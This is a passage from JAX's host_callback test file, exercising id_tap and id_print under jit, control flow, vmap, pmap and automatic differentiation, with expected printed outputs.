assert False
tap_count = 0
def tap_func(a, _, *, what=""):
nonlocal tap_count
tap_count += 1
self.assertEqual(func(5, what), a)
transform = jax.jit if with_jit else lambda f: f
for what in ("pair_1_x", "pair_x_2x", "dict"):
transformed = transform(
lambda x: hcb.id_tap(
partial(tap_func, what=what),
func(x, what),
result=func(x * 2, what))
)(5)
self.assertEqual(func(10, what), transformed)
hcb.barrier_wait() # Wait for receivers to be done
self.assertEqual(3, tap_count)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_concurrent_{concurrent}",
concurrent=concurrent)
for concurrent in [True, False]))
def test_tap_multiple(self, concurrent=False):
"""Call id_tap multiple times, concurrently or in sequence. """
if concurrent and jtu.device_under_test() in ["cpu", "gpu"]:
# TODO(necula): if there is device side concurrency, outfeeds from
# different computations can be interleaved. For example, it seems that
# on GPU if multiple host threads run a jit computation, the multiple
# computations are interleaved on the GPU. This can result in the outfeed
# trains being interleaved, which will trigger an error.
# The solution is to fix on GPU the receiving logic so that we can outfeed
# the train as one tuple, and receive it one piece as a time. Then the
# trains should be atomic.
# See also b/160692602.
raise SkipTest("concurrent id_tap not supported on CPU, GPU")
received = set()
count = 5
def pause_tap(idx, _):
received.add(int(idx))
logging.info("Starting do_tap %s. Sleeping 1sec ...", idx)
time.sleep(0.3)
logging.info("Finish do_tap %s", idx)
def do_tap(idx):
jax.jit(lambda idx: hcb.id_tap(pause_tap, idx))(idx)
if concurrent:
threads = [
threading.Thread(
name=f"enqueue_tap_{idx}", target=do_tap, args=(idx,))
for idx in range(count)
]
[t.start() for t in threads]
[t.join() for t in threads]
else:
for idx in range(count):
do_tap(idx)
hcb.barrier_wait()
self.assertEqual(received, set(range(count)))
# TODO(necula): see comment for test_multiple_tap. Here we disable also
# on TPU, because the barrier_wait runs on all devices, including on the CPU
# where it would run into concurrency problems.
@skip("Concurrency not supported")
def test_tap_multiple_barriers(self):
"""Call barrier_wait concurrently."""
def pause_tap(*args, **kwargs):
logging.info("pause_tap waiting")
time.sleep(0.3)
logging.info("pause_tap done")
def long_run(x):
return hcb.id_tap(pause_tap, x)
jax.jit(long_run)(5.)
def try_barrier(idx):
logging.info("Starting test barrier %s", idx)
hcb.barrier_wait()
logging.info("Finished test barrier %s", idx)
threads = [
threading.Thread(
name=f"barrier_{idx}", target=try_barrier, args=(idx,))
for idx in range(3)
]
[t.start() for t in threads]
[t.join() for t in threads]
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_cond(self, with_jit=False):
"""A conditional"""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="cond_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="cond_f", result=x,
output_stream=testing_stream),
x2 + 1)
x5 = hcb.id_print(x4 + 1, where="end", output_stream=testing_stream)
return x5
transform = jax.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: cond_f
-1
where: end
4""", testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_while_cond(self, with_jit=False):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(x):
x3 = hcb.id_print(x, where="w_b_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="w_b_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="w_b_f",
result=x, output_stream=testing_stream),
x3 + 1)
return hcb.id_print(x4, where="w_b_2", output_stream=testing_stream)
x10 = lax.while_loop(lambda x: x <= 3, body, x2)
res = hcb.id_print(x10, where="end", output_stream=testing_stream)
return res
transform = jax.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: w_b_1
2
where: w_b_t
3
where: w_b_2
3
where: w_b_1
3
where: w_b_f
-1
where: w_b_2
4
where: end
4""", testing_stream.output)
def test_tap_jit_while_pred_tap(self):
"""While with printing in the conditional."""
def func(x):
x1 = hcb.id_print(x, where="1")
x10 = lax.while_loop(lambda x: hcb.id_print(x < 3,
where="w_p",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x10, where="3", output_stream=testing_stream)
return res
self.assertEqual(3, jax.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self,
"""
where: w_p
True
where: w_b
2
where: w_p
True
where: w_b
3
where: w_p
False
where: 3
3""", testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_scan_cond(self, with_jit=True):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(c, x):
x3 = hcb.id_print(x, where="s_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="s_t", output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="s_f", result=x, output_stream=testing_stream),
x3 + 1)
return (c, hcb.id_print(x4, where="s_2", output_stream=testing_stream))
_, x10 = lax.scan(body, x2, jnp.arange(3))
res = hcb.id_print(x10, where="10", output_stream=testing_stream)
return res
if with_jit:
func = jax.jit(func)
res = func(1)
self.assertAllClose(jnp.array([1, 2, 3]), res)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: s_1
0
where: s_t
1
where: s_2
1
where: s_1
1
where: s_f
-1
where: s_2
2
where: s_1
2
where: s_t
3
where: s_2
3
where: 10
[1 2 3]""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_shape_{shape}_dtype_{np.dtype(dtype).name}_nr_args={nr_args}",
shape=shape,
dtype=dtype,
nr_args=nr_args) for nr_args in [1, 2]
for shape in [(), (2,), (2, 3), (2, 3, 4)]
for dtype in jtu.dtypes.all))
def test_tap_jit_dtypes(self, nr_args=2, dtype=jnp.int16, shape=(2,)):
if dtype in (jnp.complex64, jnp.complex128, jnp.bool_):
raise SkipTest(f"host_callback not implemented for {dtype}.")
if dtype == np.bool_:
args = [self.rng().choice(a=[True, False], size=shape)]
else:
args = [jnp.arange(np.prod(shape), dtype=dtype).reshape(shape)]
if nr_args > 1:
args = args * nr_args
jit_fun1 = jax.jit(lambda xs: hcb.id_print(
xs,
a_new_test="************",
testcase_name=f"shape_{shape}_dtype_{dtype}_nr_args={nr_args}"))
res = jit_fun1(args)
self.assertAllClose(args, res, check_dtypes=True)
def test_tap_jit_large(self):
arg = jnp.arange(10000, dtype=jnp.int32).reshape((10, 10, 5, -1))
jax.jit(hcb.id_print)(arg)
def test_tap_jit_several_together(self):
arg = jnp.arange(50, dtype=jnp.int32).reshape((10, 5))
jax.jit(lambda x, y: hcb.id_print((x, y, x * 2.)))(arg, jnp.ones(100, dtype=jnp.int32))
def test_tap_jit_interleaving(self):
# Several jit's without data dependencies; they may interfere
count = 0 # Count tap invocations
nr_arrays = 5
def tap_func(arg, _):
nonlocal count
assert len(arg) == nr_arrays
count += 1
# This is the function that we'll run multiple times
def func(x, count):
for i in range(count):
x = hcb.id_tap(tap_func, [x + i for i in range(nr_arrays)])[-1]
return x
x = jnp.array(1, dtype=np.int32)
res = 0
for _ in range(10):
# No dependencies between the jit invocations
res += jax.jit(lambda x: func(x, 10))(x)
hcb.barrier_wait()
self.assertEqual(100, count)
def test_tap_jit_tap_exception(self):
if not FLAGS.jax_host_callback_outfeed:
raise SkipTest("TODO: implement error handling for customcall")
# Simulate a tap error
def tap_err(*args, **kwargs):
raise NotImplementedError
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
res = jax.jit(func)(0) # No error yet
with self.assertRaises(hcb.CallbackException):
hcb.barrier_wait()
# Even though the receiver thread raised, the main thread should still
# return 3.
self.assertEqual(3, res)
# We should have received all others
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
def test_tap_while(self):
"""Executing while, even without JIT uses compiled code"""
y = jnp.ones(5) # captured const
def func(x):
return lax.while_loop(
lambda c: c[1] < 5,
lambda c: (y, hcb.id_print(c[1], output_stream=testing_stream) + 1),
(x, 1))
func(y)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
1
2
3
4""", testing_stream.output)
def test_tap_jvp(self):
jvp_fun1 = lambda x, xt: jax.jvp(fun1, (x,), (xt,))
res_primals, res_tangents = jvp_fun1(jnp.float32(5.), jnp.float32(0.1))
self.assertAllClose(100., res_primals, check_dtypes=False)
self.assertAllClose(4., res_tangents, check_dtypes=False)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
transforms: ['jvp'] what: a * 2
( 10.00 0.20 )
transforms: ['jvp'] what: y * 3
( 30.00 0.60 )""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: a * 2
10.00
what: y * 3
30.00""", testing_stream.output)
def test_tap_grad_primal_unused(self):
# The output of id_print is not needed for backwards pass
def func(x):
return 2. * hcb.id_print(x * 3., what="x * 3",
output_stream=testing_stream)
grad_func = jax.grad(func)
arg = jnp.float32(5.)
jaxpr = str(jax.make_jaxpr(grad_func)(arg))
# making the Jaxpr does not print anything
hcb.barrier_wait()
treedef = tree_util.tree_structure(arg)
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, f"""
{{ lambda ; a:f32[]. let
b:f32[] = mul a 3.00
c:f32[] = outside_call[
arg_treedef={treedef}
callback=...
identity=True
transforms=()
] b
_:f32[] = mul c 2.00
d:f32[] = mul 1.00 2.00
e:f32[] = outside_call[
arg_treedef={treedef}
callback=...
identity=True
transforms=(('jvp',), ('transpose',))
] d
f:f32[] = mul e 3.00
in (f,) }}""", jaxpr)
else:
assertMultiLineStrippedEqual(self, f"""
{{ lambda ; a:f32[]. let
b:f32[] = mul a 3.00
c:f32[] = outside_call[
arg_treedef={treedef}
callback=...
identity=True
] b
_:f32[] = mul c 2.00
d:f32[] = mul 1.00 2.00
e:f32[] = mul d 3.00
in (e,) }}""", jaxpr)
assertMultiLineStrippedEqual(self, "", testing_stream.output)
testing_stream.reset()
res_grad = grad_func(arg)
hcb.barrier_wait()
self.assertAllClose(6., res_grad, check_dtypes=False)
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
what: x * 3
15.00
transforms: ['jvp', 'transpose'] what: x * 3
2.00""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: x * 3
15.00""", testing_stream.output)
def test_tap_grad_simple(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * hcb.id_print(y * 3., what="y * 3",
output_stream=testing_stream)
grad_func = jax.grad(func)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(2. * 5. * 6., res_grad, check_dtypes=False)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
what: y * 3
30.00
transforms: ['jvp', 'transpose'] what: y * 3
5.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
what: y * 3
30.00""", testing_stream.output)
def test_tap_grad_grad(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * (y * 3.)
grad_func = jax.grad(jax.grad(func))
# making the Jaxpr does not print anything
_ = jax.make_jaxpr(grad_func)(5.)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "", testing_stream.output)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(12., res_grad, check_dtypes=False)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00
transforms: ['jvp', 'transpose', 'jvp', 'transpose'] what: x * 2
2.00
transforms: ['jvp', 'transpose'] what: x * 2
3.00""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00""", testing_stream.output)
def test_tap_grad_pytree(self):
def func(x):
x4, x5 = hcb.id_print((x * 2., x * 3.), what="pair",
result=(x * 4., x * 5.),
output_stream=testing_stream)
return x4 + 2. * x5
x = jnp.float32(5.)
grad_func = jax.grad(func)
print(jax.make_jaxpr(grad_func)(x))
res_grad = grad_func(x)
self.assertAllClose(14., res_grad, check_dtypes=False)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
what: pair
( 10.00 15.00 )
transforms: ['jvp', 'transpose'] what: pair
( 0.00 0.00 )""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: pair
( 10.00 15.00 )""", testing_stream.output)
def test_tap_jvp_float0(self):
def f(x, yint):
x, yint = hcb.id_tap(lambda arg, _: arg, (x, yint))
return x * yint
res = jax.jvp(f, (2., 3), (0.2, np.zeros((), dtypes.float0)))
self.assertAllClose((6., 0.6), res)
def test_tap_grad_float0(self):
def func(x, yint):
x, yint = hcb.id_print((x, yint), what="pair", output_stream=testing_stream)
return x * yint
grad_func = jax.grad(func)
res_grad = grad_func(jnp.float32(5.), jnp.int32(2))
self.assertAllClose(2., res_grad, check_dtypes=False)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
what: pair
( 5.00 2 )
transforms: ['jvp', 'transpose'] what: pair
( 2.00 False )""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
what: pair
( 5.00 2 )""", testing_stream.output)
def test_tap_grad_float0_result(self):
# https://github.com/google/jax/issues/7340
# x is a Tuple[f32[2], s32[3]]
x = (np.array([.7, .8], dtype=np.float32),
np.array([11, 12, 13], dtype=np.int32))
def f_jax(x):
x = hcb.id_print(x, result=x, output_stream=testing_stream) # result= is important
return (3. * x[0], x[1])
def f_jax_vjp(x):
res, pullback = jax.vjp(f_jax, x)
g, = pullback((np.ones(x[0].shape, dtype=x[0].dtype),
np.zeros(x[1].shape, dtype=dtypes.float0)))
return g
g = f_jax_vjp(x)
self.assertAllClose(np.array([3., 3.], dtype=np.float32), g[0])
self.assertEqual(dtypes.float0, g[1].dtype)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )
transforms: ['jvp', 'transpose']
( [0.00 0.00] [False False False] )""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )""", testing_stream.output)
def test_tap_higher_order_grad_float0_result(self):
# https://github.com/google/jax/issues/7340
# x is a Tuple[f32[2], s32[3]]
x = (np.array([.7, .8], dtype=np.float32),
np.array([11, 12, 13], dtype=np.int32))
def f_jax(x):
x = hcb.id_print(x, result=x, output_stream=testing_stream) # result= is important
return (jnp.sin(x[0]), x[1])
def wrap_vjp(f, args, res_f_of_args):
# Given a function "f" and "args" return the f_vjp and args_vjp
def make_ct(res):
res_dtype = np.result_type(res)
if res_dtype == dtypes.float0:
return res
ct_dtype = core.primal_dtype_to_tangent_dtype(res_dtype)
return np.ones(np.shape(res), dtype=ct_dtype)
cts = tree_util.tree_map(make_ct, res_f_of_args)
def f_vjp(args, cts):
res, pullback = jax.vjp(f, *args)
return pullback(cts)
return (f_vjp, (args, cts))
res = f_jax(x)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )""", testing_stream.output)
testing_stream.reset()
# 1st order
f_jax_vjp1, args_vjp1 = wrap_vjp(f_jax, (x,), res)
res_vjp1 = f_jax_vjp1(*args_vjp1)
hcb.barrier_wait()
if FLAGS.jax_host_callback_ad_transforms:
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )
transforms: ['jvp', 'transpose']
( [0.00 0.00] [False False False] )""", testing_stream.output)
else:
assertMultiLineStrippedEqual(self, """
( [0.70 0.80] [11 12 13] )""", testing_stream.output)
testing_stream.reset()
# 2nd order
f_jax_vjp2, args_vjp2 = wrap_vjp(f_jax_vjp1, args_vjp1, res_vjp1)
res_vjp2 = f_jax_vjp2(*args_vjp2)
# 3rd order
f_jax_vjp3, args_vjp3 = wrap_vjp(f_jax_vjp2, args_vjp2, res_vjp2)
_ = f_jax_vjp3(*args_vjp3)
def test_tap_vmap(self):
vmap_fun1 = jax.vmap(fun1)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
vmap_fun1(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] what: a * 2
[ 8.00 10.00]
transforms: [('batch', {'batch_dims': (0,)})] what: y * 3
[24.00 30.00]""", testing_stream.output)
def test_tap_vmap_not_batched(self):
x = 3.
def func(y):
# x is not mapped, y is mapped
_, y = hcb.id_print((x, y), output_stream=testing_stream)
return x + y
vmap_func = jax.vmap(func)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
_ = vmap_func(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (None, 0)})]
( 3.00 [4.00 5.00] )""", testing_stream.output)
def test_tap_vmap_vmap(self):
# A 2D tensor with x[i, j] = i + j using 2 vmap
def sum(x, y):
return hcb.id_print(x + y, output_stream=testing_stream)
def sum_rows(xv, y):
return jax.vmap(sum, in_axes=(0, None))(xv, y)
def sum_all(xv, yv):
return jax.vmap(sum_rows, in_axes=(None, 0))(xv, yv)
xv = jnp.arange(5, dtype=np.int32)
yv = jnp.arange(3, dtype=np.int32)
# assertMultiLineStrippedEqual(self, "", str(jax.make_jaxpr(sum_all)(xv, yv)))
_ = sum_all(xv, yv)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)}), ('batch', {'batch_dims': (0,)})]
[[0 1 2 3 4]
[1 2 3 4 5]
[2 3 4 5 6]]""", testing_stream.output)
def test_tap_vmap_while(self):
"""Vmap of while."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="before:x", output_stream=testing_stream)
x2 = lax.while_loop(
lambda x: x < 2, lambda x: hcb.id_print(
x + 1, where="body:x+1", output_stream=testing_stream), x1)
res = hcb.id_print(x2, where="after:x", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
self.assertAllClose(
np.array([2, 2, 2, 3, 4]),
jax.jit(jax.vmap(func))(inputs),
check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(
self, """
transforms: [('batch', {'batch_dims': (0,)})] where: before:x
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: body:x+1
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: body:x+1
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: after:x
[2 2 2 3 4]""", testing_stream.output)
def test_tap_vmap_while_tap_cond(self):
"""Vmap of while, with a tap in the conditional."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = lax.while_loop(lambda x: hcb.id_print(x < 2, where="w_c",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x2, where="3", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
res = jax.jit(jax.vmap(func))(inputs)
hcb.barrier_wait()
self.assertAllClose(np.array([2, 2, 2, 3, 4]), res, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] where: 1
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True True False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[False False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: 3
[2 2 2 3 4]""", testing_stream.output)
def test_tap_transforms_old_doc(self):
if not FLAGS.jax_host_callback_ad_transforms:
raise unittest.SkipTest("disabled for new behavior")
# Examples from the documentation
def power3(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
_, y = hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
return y * x
print(f"impl = {power3(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap = {jax.vmap(power3)(np.arange(3.))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [0. 1. 2.] [0. 1. 4.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"jvp = {jax.jvp(power3, (3.,), (0.1,))}")
hcb.barrier_wait()
expected = """
transforms: ['jvp'] what: x,x^2
( ( 3. 9. ) ( 0.1 0.6 ) )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"grad = {jax.grad(power3)(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )
transforms: ['jvp', 'transpose'] what: x,x^2
( 0. 3. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap o grad {jax.vmap(jax.grad(power3))(np.array([2., 3.]))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [2. 3.] [4. 9.] )
transforms: ['jvp', 'transpose', ('batch', {'batch_dims': (None, 0)})] what: x,x^2
( 0. [2. 3.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
def test_tap_transforms_doc(self):
# Examples from the documentation
if FLAGS.jax_host_callback_ad_transforms:
raise unittest.SkipTest("disabled for old behavior")
def power3(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
return y * x
print(f"impl = {power3(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"jvp = {jax.jvp(power3, (3.,), (0.1,))}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
@jax.custom_jvp
def print_tangents(arg):
return None
@print_tangents.defjvp
def print_tangents_jvp(primals, tangents):
arg_dot, = tangents
hcb.id_print(arg_dot, what="tangents", output_stream=testing_stream)
return primals, tangents
def power3_with_tangents(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
print_tangents((x, y))
return y * x
print(f"jvp = {jax.jvp(power3_with_tangents, (3.,), (0.1,))}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )
what: tangents
( 0.1 0.6 )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"grad = {jax.grad(power3)(3.)}")
hcb.barrier_wait()
# Only the primals by default
expected = """
what: x,x^2
( 3. 9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
@jax.custom_vjp
def print_cotangents(arg):
# Must return the argument for which we want the cotangent.
return arg
# f_fwd: a -> (b, residual)
def print_cotangents_fwd(arg):
return print_cotangents(arg), None
# f_bwd: (residual, CT b) -> [CT a]
def print_cotangents_bwd(residual, ct_b):
hcb.id_print(ct_b, what="cotangents", output_stream=testing_stream)
return ct_b,
print_cotangents.defvjp(print_cotangents_fwd, print_cotangents_bwd)
def power3_with_cotangents(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
# Must use the output of print_cotangents
(x1, y1) = print_cotangents((x, y))
return y1 * x1
print(f"grad = {jax.grad(power3_with_cotangents)(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )
what: cotangents
( 9. 3. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
# TODO: grad of grad
print(f"vmap = {jax.vmap(power3)(np.array([2., 3.]))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [2. 3.] [4. 9.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap o grad {jax.vmap(jax.grad(power3))(np.array([2., 3.]))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [2. 3.] [4. 9.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap o grad {jax.vmap(jax.grad(power3_with_cotangents))(np.array([2., 3.]))}")
hcb.barrier_wait()
expected = """
transforms: [('batch', {'batch_dims': (0, 0)})] what: x,x^2
( [2. 3.] [4. 9.] )
transforms: [('batch', {'batch_dims': (0, 0)})] what: cotangents
( [4. 9.] [2. 3.] )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"grad o remat = {jax.grad(lambda x: power3(ad_checkpoint.checkpoint(power3)(x)))(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3. 9. )
what: x,x^2
( 27. 729. )
what: x,x^2
( 3. 9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
def test_tap_pmap(self):
if len(local_devices()) < 2:
raise SkipTest("test requires at least 2 devices")
def power3(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
_, y = hcb.id_print((x, y),
what="x,x^2",
output_stream=testing_stream,
tap_with_device=True)
return y * x
pmap_power3 = jax.pmap(power3, devices=local_devices())
xv = np.array([3, 4], dtype=np.int32)
res = pmap_power3(xv)
hcb.barrier_wait()
self.assertAllClose(xv * xv * xv, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(
self, """
device: cpu:0 what: x,x^2
( 3 9 )
device: cpu:1 what: x,x^2
( 4 16 )""")
def test_tap_pmap_vmap(self):
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
shape = (nr_devices, 3)
matrix = np.fromfunction(lambda i, j: 10. * i + j, shape,
dtype=np.int32)
def fun1(x, do_print=False): # x: i32
return maybe_print(do_print, x * 2, "x * 2", tap_with_device=True)
pmap_vmap_fun1 = jax.pmap(
jax.vmap(partial(fun1, do_print=True)), devices=local_devices())
res = pmap_vmap_fun1(matrix)
hcb.barrier_wait()
expected_res = jax.pmap(
jax.vmap(partial(fun1, do_print=False)), devices=local_devices())(
matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[20.00 22.00 24.00]""")
def test_tap_pmap_pmap_vmap(self):
# A matrix M[ijk] = i * 100 + j * 10 + k
nr_devices = len(local_devices())
if nr_devices % 2 != 0:
raise SkipTest("test works only on even number of devices")
shape = (2, nr_devices // 2, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun1(x, do_print=False): # x: f32
y = maybe_print(do_print, x * 2., "x * 2", tap_with_device=True)
return y ** 2
pmap_fun1 = jax.pmap(
jax.pmap(jax.vmap(partial(fun1, do_print=True))),
devices=local_devices())
res = pmap_fun1(matrix)
hcb.barrier_wait()
expected_res = jax.pmap(
jax.pmap(jax.vmap(partial(fun1, do_print=False))),
devices=local_devices())(
matrix)
self.assertAllClose(expected_res, res, check_dtypes=False)
# Assertion text is for 2 devices (also works for 1 device)
assertMultiDeviceOutputEqual(self, """
device: cpu:0 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[0.00 2.00 4.00]
device: cpu:1 transforms: [('batch', {'batch_dims': (0,)})] what: x * 2
[200.00 202.00 204.00]""")
@ignore_jit_of_pmap_warning()
def test_tap_pmap_pmap_extra(self):
"""pmap of a pmap surrounded by extra code."""
# A matrix M[ij] = i * 10 + j
nr_devices = len(local_devices())
if nr_devices != 2:
raise SkipTest("test works only on 2 devices")
shape = (2, 1, 3)
matrix = np.fromfunction(lambda i, j, k: 100. * i + 10. * j + k, shape,
dtype=np.float32)
def fun(xv, do_print=False):
# This will be printed on all devices, with shape [1, 3]
xv = maybe_print(do_print, xv + 1., "before", tap_with_device=True)
res = jax.pmap(lambda x: maybe_print(do_print, x * 2., "inside", tap_with_device=True))(xv)
# This will be printed on all devices, with shape [1, 3]
return maybe_print(do_print, res + 1., "after", tap_with_device=True)
res = jax.pmap(partial(fun, do_print=True))(matrix)
